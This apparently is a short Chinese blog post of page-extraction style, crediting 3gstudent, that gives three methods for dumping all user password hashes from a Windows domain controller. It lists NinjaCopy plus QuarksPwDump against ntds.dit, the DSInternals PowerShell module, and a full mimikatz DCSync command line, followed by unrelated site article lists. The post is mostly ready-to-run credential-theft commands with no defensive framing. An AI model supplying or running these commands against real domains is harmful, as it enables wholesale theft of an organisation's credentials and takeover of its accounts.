获取Windows域控所有用户hash:
参考:3gstudent

方法1:
复制ntds.dit:

使用NinjaCopy,https://github.com/3gstudent/NinjaCopy

导出hash:

使用quarkspwdump,https://github.com/quarkslab/quarkspwdump

esentutl /p /o ntds.dit
QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt

方法2:
使用powershell:DSInternals PowerShell Module

https://www.dsinternals.com/wp-content/uploads/DSInternals_v2.8.zip

适用条件:

Windows PowerShell 3.0 or 3.0+

.NET Framework 4.0 or 4.0+

方法3:
mimikatz:

mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"

最新文章

  1. java中关键字volatile的作用
  2. Sybase 常用SQL
  3. Linux 搭建Java web服务器
  4. Lambda GroupBy Sum
  5. js-JavaScript高级程序设计学习笔记17
  6. document.referrer 特性
  7. 使用JSONP跨域请求数据
  8. Leetcode#137 Single Number II
  9. list转换成DataTable
  10. bzoj 1602 [Usaco2008 Oct]牧场行走(LCA模板)
  11. C++ 的多重继承
  12. HDU 4777 Rabbit Kingdom
  13. 3408: [Usaco2009 Oct]Heat Wave 热浪
  14. centos7使用kubeadm安装部署kubernetes 1.14
  15. JAVA ==号和equals()的区别
  16. Android内存优化(一)Dalvik虚拟机和ART虚拟机对比
  17. Unity 琐碎(2): Shader 颜色调试
  18. 各种缓存(Memcached、Redis、RabbitMQ、SQLlchemy)
  19. 回到未来123Back To The Future
  20. Win7系统中MySQL服务无法启动的解决方法

热门文章

  1. JPA中JpaRepository的使用
  2. springmvc 拦截器流程图
  3. redis学习(一)
  4. c#学习笔记1-简单算法
  5. STM32 系统滴答计时器
  6. t100 debug常用指令
  7. 24H玩转 Grafana 被工程师称相当专业,如何做到?
  8. Linux生产环境上,最常用的一套“Sed“技巧
  9. 2019 2345网址导航java面试笔试题 (含面试题解析)
  10. Java—十进制数对n进制数转换